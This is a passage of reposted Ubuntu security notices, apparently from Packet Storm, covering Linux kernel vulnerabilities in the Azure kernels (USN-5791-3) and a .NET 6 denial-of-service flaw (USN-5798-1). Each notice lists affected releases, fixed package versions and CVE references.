driver in the Linux kernel contained a use-after-free vulnerability. A  
local attacker could use this to cause a denial of service (system crash)  
or possibly execute arbitrary code. (CVE-2022-4095)

It was discovered that the USB monitoring (usbmon) component in the Linux  
kernel did not properly set permissions on memory mapped in to user space  
processes. A local attacker could use this to cause a denial of service  
(system crash) or possibly execute arbitrary code. (CVE-2022-43750)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 20.04 LTS:  
   linux-image-5.4.0-1100-azure-fde  5.4.0-1100.106+cvm1.1  
   linux-image-azure-fde           5.4.0.1100.106+cvm1.35

Ubuntu 18.04 LTS:  
   linux-image-5.4.0-1100-azure    5.4.0-1100.106~18.04.1  
   linux-image-azure               5.4.0.1100.73

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-5791-3  
   https://ubuntu.com/security/notices/USN-5791-1  
   CVE-2022-20421, CVE-2022-2663, CVE-2022-3061, CVE-2022-3303,  
   CVE-2022-3586, CVE-2022-3646, CVE-2022-39842, CVE-2022-40307,  
   CVE-2022-4095, CVE-2022-43750

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-azure-fde/5.4.0-1100.106+cvm1.1  
   https://launchpad.net/ubuntu/+source/linux-azure-5.4/5.4.0-1100.106~18.04.1

Ubuntu Security Notice USN-5791-3

Ubuntu Security Notice 5798-1 - Johan Gorter discovered that .NET 6 incorrectly processed certain invalid HTTP requests. An attacker could possibly use this issue to cause a denial of service condition for an exposed endpoint.

==========================================================================  
Ubuntu Security Notice USN-5798-1  
January 10, 2023

dotnet6 vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.10  
- Ubuntu 22.04 LTS

Summary:

dotnet6 could be made to crash if it received specially crafted  
network traffic.

Software Description:  
- dotnet6: dotNET CLI tools and runtime

Details:

Johan Gorter discovered that .NET 6 incorrectly processed certain  
invalid HTTP requests. An attacker could possibly use this issue to  
cause a denial of service condition for an exposed endpoint.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.10:  
   aspnetcore-runtime-6.0          6.0.113-0ubuntu1~22.10.1  
   dotnet-host                             6.0.113-0ubuntu1~22.10.1  
   dotnet-hostfxr-6.0                   6.0.113-0ubuntu1~22.10.1  
   dotnet-runtime-6.0                  6.0.113-0ubuntu1~22.10.1  
   dotnet-sdk-6.0                        6.0.113-0ubuntu1~22.10.1  
   dotnet6                                   6.0.113-0ubuntu1~22.10.1

Ubuntu 22.04 LTS:  
   aspnetcore-runtime-6.0         6.0.113-0ubuntu1~22.04.1  
   dotnet-host                            6.0.113-0ubuntu1~22.04.1  
   dotnet-hostfxr-6.0                  6.0.113-0ubuntu1~22.04.1  
   dotnet-runtime-6.0                 6.0.113-0ubuntu1~22.04.1  
   dotnet-sdk-6.0                       6.0.113-0ubuntu1~22.04.1  
   dotnet6                                  6.0.113-0ubuntu1~22.04.1

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-5798-1  
   CVE-2023-21538

Package Information:  
   https://launchpad.net/ubuntu/+source/dotnet6/6.0.113-0ubuntu1~22.10.1  
   https://launchpad.net/ubuntu/+source/dotnet6/6.0.113-0ubuntu1~22.04.1

Source

Packet Storm